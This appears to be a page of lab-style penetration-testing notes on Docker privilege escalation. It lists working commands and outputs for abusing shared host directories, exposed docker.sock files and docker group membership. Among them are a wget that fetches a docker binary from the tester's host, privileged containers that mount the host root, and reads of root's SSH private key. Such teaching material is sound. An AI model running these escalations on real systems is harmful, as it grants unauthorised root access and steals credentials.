Docker

Docker Privilege Escalation

Docker Shared Directories

Sample Exploitation

  1. Find Files

    $ cd /hostsystem/home/cry0l1t3
root@container:/hostsystem/home/cry0l1t3$ ls -l

-rw-------  1 cry0l1t3 cry0l1t3  12559 Jun 30 15:09 .bash_history
-rw-r--r--  1 cry0l1t3 cry0l1t3    220 Jun 30 15:09 .bash_logout
-rw-r--r--  1 cry0l1t3 cry0l1t3   3771 Jun 30 15:09 .bashrc
drwxr-x--- 10 cry0l1t3 cry0l1t3   4096 Jun 30 15:09 .ssh

  2. You found ssh key and now you can login

    $ cat .ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
<SNIP>

Docker Sockets

A special file that allows the docker client to communicate with the docker daemon

Sample Exploitation

  1. We found a docker.sock file

    $ ls -al

total 8
drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
drwxr-xr-x 1 root        root        4096 Jun 30 15:12 ..
srw-rw---- 1 root        root           0 Jun 30 15:27 docker.sock

  2. Use docker (download from here) to interact with the socket

    $ wget https://<parrot-os>:443/docker -O docker
$ chmod +x docker
$ ls -l

-rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker


$ /tmp/docker -H unix:///app/docker.sock ps

CONTAINER ID     IMAGE         COMMAND                 CREATED       STATUS           PORTS     NAMES
3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago    Up 12 minutes    443/tcp   app
<SNIP>

  3. Create our own Docker container that maps the host’s root directory (/) to the /hostsystem directory on the container

    $ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app
$ /tmp/docker -H unix:///app/docker.sock ps

CONTAINER ID     IMAGE         COMMAND                 CREATED           STATUS           PORTS     NAMES
7ae3bcc818af     main_app      "/docker-entry.s..."    12 seconds ago    Up 8 seconds     443/tcp   app
3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago        Up 17 minutes    443/tcp   app
<SNIP>

  4. Login to the new container

    $ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash


# cat /hostsystem/root/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
<SNIP>

Docker Group

Sample Exploitation

  1. We must be in the docker group. (or docker has SUID set or we are included in the sudoers file that can run docker as root)

    $ id

uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker)

  2. With this, we can run commands like

    $ docker image ls

REPOSITORY                           TAG                 IMAGE ID       CREATED         SIZE
ubuntu                               20.04               20fffa419e3a   2 days ago    72.8MB

  3. Run this command (from gtfobins, use alpine or the image id from step 2)

    $ docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Docker Socket

This occurs when we are not in root/docker group but docker.sock is writable. The default path for this is /var/run/docker.sock

$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
#
PreviousLXD/LXCNextKubernetes

Last updated